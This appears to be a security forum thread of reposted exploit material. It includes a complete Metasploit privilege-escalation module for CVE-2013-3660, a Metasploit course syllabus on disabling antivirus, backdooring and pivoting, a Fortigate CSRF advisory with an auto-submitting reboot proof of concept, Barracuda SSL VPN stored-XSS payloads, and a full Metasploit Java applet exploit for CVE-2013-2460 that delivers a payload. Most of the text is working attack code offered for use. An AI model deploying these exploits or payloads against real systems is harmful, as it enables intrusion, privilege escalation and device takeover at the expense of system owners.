    Description : This Metasploit module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1. Author : Tavis Ormandy, egypt, sinn3r, juan vazquez, progmboy, Meatballs, Keebie4e Source : Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/process' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit 'progmboy <programmeboy[at]gmail.com>', # Original Exploit 'Keebie4e', # Metasploit integration 'egypt', # Metasploit integration 'sinn3r', # Metasploit integration 'Meatballs', # Metasploit integration 'juan vazquez' # Metasploit integration ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2013-3660' ], [ 'EDB', '25912' ], [ 'OSVDB', '93539' ], [ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ], ], 'DisclosureDate' => 'May 15 2013', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] if os =~ /windows/i return Exploit::CheckCode::Vulnerable end end def exploit if sysinfo["Architecture"] =~ /wow64/i fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported") end print_status("Creating a new process and migrating...") cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe" new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) new_pid = new_proc.pid if not new_pid print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself") else print_status("Migrating to #{new_pid}") migrate_res = false begin migrate_res = session.core.migrate(new_pid) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError migrate_res = false end if migrate_res print_good("Successfully migrated to process #{new_pid}") else print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually") end end print_status("Trying to load the exploit and executing...") session.core.load_library({ "LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"), "UploadLibrary" => true, "Extension" => false, "TargetFilePath" => "#{rand_text_alpha(5 + rand(3))}.dll", "SaveToDisk" => false }) print_status("Checking privileges after exploitation...") if is_system? print_good("Exploitation successful!") else fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful but should be safe to try again") end if execute_shellcode(payload.encoded) print_good("Enjoy!") else fail_with(Exploit::Failure::Unknown, "Error while executing the payload") end end end
  22. Matt
    Description : This is the course material for the SMFE Certification Author : SecurityTube_Bot Source : Security Metasploit Framework Expert Securitytube Metasploit Framework Expert Part 1 : Exploits Basics In this video, we will look at the basics of vulnerability, how to use a raw one using the exploit source code and identify the problems with this approach. This will then lead to the need for a tool like Metasploit. Securitytube Metasploit Framework Expert Part 2 : Why Metasploit ? In Part 2, we will look at how to use Metasploit to exploit vulnerabilities in the Dcom and Netapi services. We will also learn how to de-couple exploits and payloads, and mix and match them. Securitytube Metasploit Framework Expert Part 3 : Meterpreter Basics In this video, we will look at the basics of Meterpreter - how it uses reflective DLL injection to stay in-memory, communicates over encrypted channels, uses TLV for communication which allows for multi-channel communication and a bunch of other things. Securitytube Metasploit Framework Expert : Armitage This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Securitytube Metasploit Framework Expert Part 4 : Framework Organization In this video, we will look at the organization of the Metasploit framework, the different directories, what they contain and finally a deeper look into the different kind of payloads - Singles, Stagers and Stages. Securitytube Metasploit Framework Expert Part 5 : Post-Exploitation Kung-Fu In this video, we will look at how to use Meterpreter in the post exploitation phase to dig deeper into the victim computer - configurations, users, idletime, are we in a virtual environment?, enumerating windows configurations etc. Securitytube Metasploit Framework Expert Part 6 : Post Exploitation Privilege Escalation In this video, we will look at privilege escalation in the post exploitation phase using Metasploit. It's a short sweet video on using the system meterpreter script along with other things. Securitytube Metasploit Framework Expert Part 7 : KILLING AV AND DISABLING FIREWALL In this video, we will look at how to disable the windows firewall and kill the AV after breaking in. The interesting thing to note is that the default script to kill AV in meterpreter which is "Killav" fails with almost all of the latest AVs because it uses a simple exe image name search and tries to kill the processes. However, as most of the AV manufacturers run a watchdog service which is typically unstoppable, this service restarts the AV processes again. We will learn how to find the services which are running on the system, locate the AV services, change their configurations from the command line and then see how to kill them. Most of this video, has little to do with Metasploit and more to do with how to "do a custom kill" After, one cannot be as good as the tools he uses Tools are an aid, not a crutch. Securitytube Metasploit Framework Expert Part 8 : Stdapi And Priv Extensions In this video, we will understand more about Windows sessions, desktops - both interactive and non-interactive, and the essential role they play in getting things done during post exploitation. What we will see is that unless we are associated with the WinSta0 desktops - Default for current user sessions, Winlogon for Login screen and Disconnect for password protected screensavers, we will not be able to successfully do things like log keystrokes or play with UI interaction. This is a must watch and may answer a lot of questions you may have esp. if you've had things like the key logger script fail on you in post exploitation! Securitytube Metasploit Framework Expert Part 9 : Token Stealing And Incognito In this video, we will look at what Windows tokens are and how a hacker can steal tokens to impersonate the identity of another user on either the local machine or network wide. We will explore the incognito extension to understand how to steal and use tokens on a compromised box in the post exploitation phase. This is a very important concept, so please pay attention Securitytube Metasploit Framework Expert Part 10 : Espia And Sniffer Extensions In Post Exploitation In this video, we will look at the Espia and Sniffer extensions and how to use them to grab remote screenshots and to run a sniffer on one or multiple interfaces on the victim computer. The Sniffer extension allows for the export of the captured packets in a pcap file, which can be transported back to the attacker's machine. This extension can come in really handy to understand the local network in the victim's environment, not to mention the possibility of being able to sniff any credentials which may be sent out or received by the victim in plain text. Securitytube Metasploit Framework Expert Part 11 : Post Exploitation Backdoors In this video, we will look at how to backdoor exploited systems using Metasploit. After all, you have taken all the pains to break in might as well retain access for a cool demo to the client later on We will look at the two popular ways to backdoor with Metasploit - Persistence and Metsvc. We will also look at where to find 3rd part backdoors and rootkits. Securitytube Metasploit Framework Expert Part 12 : Pivoting After Post Exploitation In this video, we will learn an interesting technique on how to break deeper into a network, using the first machine we compromise in the network. The idea is to "pivot" around the first host and then break further in. The idea is that Metasploit will do all the hard work for you and proxy all the connections via the meterpreter session on the first compromised host to the rest of the internal network of the victim machine. Pivoting is probably one of the most important concepts in penetration testing and most of the "real world hacking" relies on this. Securitytube Metasploit Framework Expert Part 13 : Port Forwarding As Part Of Post Exploitation In this video, we will look at how to use a compromised host to port forward the attacker traffic to internal hosts in the victim's network. This trick comes in extremely handy when the attacker needs to access internal applications and services on the victim's network which are not accessible via the public IP addresses. We will see how in this case, the attacker is able to access an internal web based file sharing service used by the employees of a company. Securitytube Metasploit Framework Expert Part 14 : Client Side Exploits In this video, we will look at how to use a compromised host to port forward the attacker traffic to internal hosts in the victim's network. This trick comes in extremely handy when the attacker needs to access internal applications and services on the victim's network which are not accessible via the public IP addresses. We will see how in this case, the attacker is able to access an internal web based file sharing service used by the employees of a company. Securitytube Metasploit Framework Expert Part 15 : Backdoors And Rootkits In Post Exploitation In this video, we will look at how to backdoor executables with Metasploit. The idea is to use Msfpayload and Msfencode (or Msfvenom which is a combination of both the tools) to take an existing executable and add a payload which Metasploit supports. In the most typical case, we will take a common executable like notepad.exe and then integrate our payload with it. We have 2 choices - use the executable template but only make the payload run or make both the original executable and the payload run. We will discuss both of these cases in this video. We will also take a quick glance at AV Evasion using a polymorphic encoder which ships with Metasploit along with how to use upx.exe to pack it. Please note that AV evasion is a topic in itself and in this course, we will restrict ourself to what we can accomplish with Metasploit. Securitytube Metasploit Framework Expert Part 16 : Exploit Research With Metasploit In this video, we will go through the basics of Exploit Research and take up an example from the Exploit Research Megaprimer ( ) to illustrate how to use msfvenom, pattern_create and pattern_offset to analyze vulnerabilities and create working exploit code for them. This is a must watch if you plan to use Metasploit for Exploit Research. Securitytube Metasploit Framework Expert Part 17 : Railgun Basics In this video, we will look at an interesting extension called Railgun which allows the attacker to run arbitrary code from DLLs on the victim system. We will have multiple videos on Railgun - in this video we will look at some of the basic functionality of railgun and see how we can use this. Pay close attention to this, as this is a powerful weapon in your hacking arsenal Securitytube Metasploit Framework Expert Part 18 : Railgun Adding Functions In this video, we will look at how to dynamically add functions to DLLs either at runtime or define them statically in the definition files in Metasploit. This is really important for anyone who wants to extend the functionality of Railgun and use it for advanced pentesting. Securitytube Metasploit Framework Expert Part 19 : Railgun Adding New Dlls This is the final video on Railgun in which we learn how to add new custom DLL support either on the fly or create a new DLL definition file for it. This technique allows us to leverage existing DLLs on the remote system and also upload and run code from out custom DLLs. This gives us a lot of power! Securitytube Metasploit Framework Expert Part 19a : Railgun Adding New Dlls On Windows 7 In Part 19, we had demonstrated how to add a new DLL "mpr.dll" at either runtime or in advance to Railgun. In this video, we will quickly do the exact same demo on the Windows 7 Professional platform. This is just to demonstrate that even though a majority of the demonstrations were on Windows XP, the principles remain the same. Securitytube Metasploit Framework Expert Part 20 : Resource Scripts In this video, we will learn on how to automate tasks in Metasploit using resource scripts - either at startup time or runtime. Resource scripts can really take the pain away of manually having to type in the same set of commands everytime Securitytube Metasploit Framework Expert Part 21 : Database Support In this video, we will look at how to tap into the database support offered by Metasploit to store persistent results of the penetration tests we conduct. We will look at the concepts of workspaces, hosts, services, vuln tables etc. in course of this video. Securitytube Metasploit Framework Expert Part 22 : Using Plugins In this video, we will look at how to use plugins in Metasploit to leverage 3rd party tools. Securitytube Metasploit Framework Expert Part 23 : Meterpreter Api Basics In this video, we will explore how to unearth the Meterpreter API from the framework code base and start using it. We will see how to run the calls from the irb mode while in a post exploitation meterpreter session. This video will lay the foundation for creating meterpreter scripts. Securitytube Metasploit Framework Expert Part 24 : Meterpreter Scripting Migrate Clone In this video, we will look at how to create a Meterpreter script to migrate from one process to the other, using our new found knowledge of the Meterpreter API. Securitytube Metasploit Framework Expert Part 25 : Meterpreter Scripting Process Name Search In this video, we will explore how to find the right APIs to dig deep into processes running on the victim system and search for a particular process by name.
  23. Matt
    Author : Sven Wurth Source : Fortigate Firewalls - CSRF Vulnerability Code : Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2 Description ========== Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. Requirements =========== An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. Report-Timeline: ================ Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed Google Dork: ========== -english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser" Credit: ===== Sven Wurth dos@net-war.de PoC ==== This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability. ##### CSRF - Proof Of Concept #### <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post"> <input type="hidden" name="reason" value=""> <input type="hidden" name="action" value="1"> <input type="submit" name="add" value="rebootme"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> ##### End Poc #####
  24. Matt
    Author : LiquidWorm Source : Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities Code : Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities Vendor: Barracuda Networks, Inc. Product web page: https://www.barracuda.com Affected version: 2.3.3.193, Model: V680 Summary: The Barracuda SSL VPN is a powerful plug-and-play appliance purpose-built to provide remote users with secure access to internal network resources. Desc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session. Tested on: Linux 2.4.x, Jetty Web Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [05.03.2013] Vulnerabilities discovered. [16.03.2013] Contact with the vendor. [17.03.2013] Vendor replies. [19.03.2013] Working with the vendor. [28.03.2013] Vendor confirms issues, track BNSEC-1239. [15.04.2013] Asked vendor for status update. [17.04.2013] Vendor replies. [18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193) [07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues. [08.05.2013] Coordinating with the vendor. [08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved. [01.07.2013] Coordinated public security advisory released. Advisory ID: ZSL-2013-5147 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php Barracuda Labs: http://barracudalabs.com/?page_id=3456 http://barracudalabs.com/?page_id=3458 05.03.2013 -- ==================================================================================== https://server/showSystemConfiguration.do?categoryId=821 CRLs ADD: "><script>alert(1);</script> Parameter: propertyItem[25].value ==================================================================================== https://server/showAuditReports.do (Reports) Username ADD: "><script>alert(1);</script> Parameters: user account ==================================================================================== https://server/showSystemConfiguration.do?categoryId=14800 Files to Scan ADD: "><script>alert(1);</script> Files to Exclude from Scanning ADD: "><script>alert(2);</script> Files to Block ADD: "><script>alert(3);</script> Parameters: propertyItem[1].value propertyItem[2].value propertyItem[3].value ==================================================================================== https://server/showSystemConfiguration.do?categoryId=810 Public Internal Web Sites ADD: "><script>alert(1);</script> VPN Port ADD: "><script>alert(2);</script> Parameters: propertyItem[1].value propertyItem[8].value ==================================================================================== https://server/showAvailableAccounts.do Available Groups ADD: "><script>alert(1);</script> Parameter: selectedRoles ==================================================================================== https://server/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit Account ADD: "><script>alert(1);</script> Group ADD: "><script>alert(2);</script> Policy ADD: "><script>alert(3);</script> Parameter: policy ==================================================================================== https://server/editAccount.do?actionTarget=edit&username=guest&parent_name=edit Available Groups ADD: "><script>alert(1);</script> Authorized IP Addresses ADD: "><script>alert(2);</script> Other Computers (Waks-On-LAN) ADD: "><script>alert(3);</script> Parameters: selectedRoles propertyItem[1].value propertyItem[6].value ==================================================================================== https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit Group ADD: "><script>alert(1);</script> Parameter: resourceName ====================================================================================
  25. Matt
    Author : metasploit Source : Java Applet ProviderSkeleton Insecure Invoke Method Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) EXPLOIT_STRING = "Exploit" def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method', 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2460' ], [ 'OSVDB', '94346' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2013' )) end def randomize_identifier_in_jar(jar, identifier) identifier_str = rand_text_alpha(identifier.length) jar.entries.each { |entry| entry.name.gsub!(identifier, identifier_str) entry.data = entry.data.gsub(identifier, identifier_str) } end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) randomize_identifier_in_jar(jar, "metasploit") randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q| <html> <body> <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </body> </html> | return html end end
×
×
  • Create New...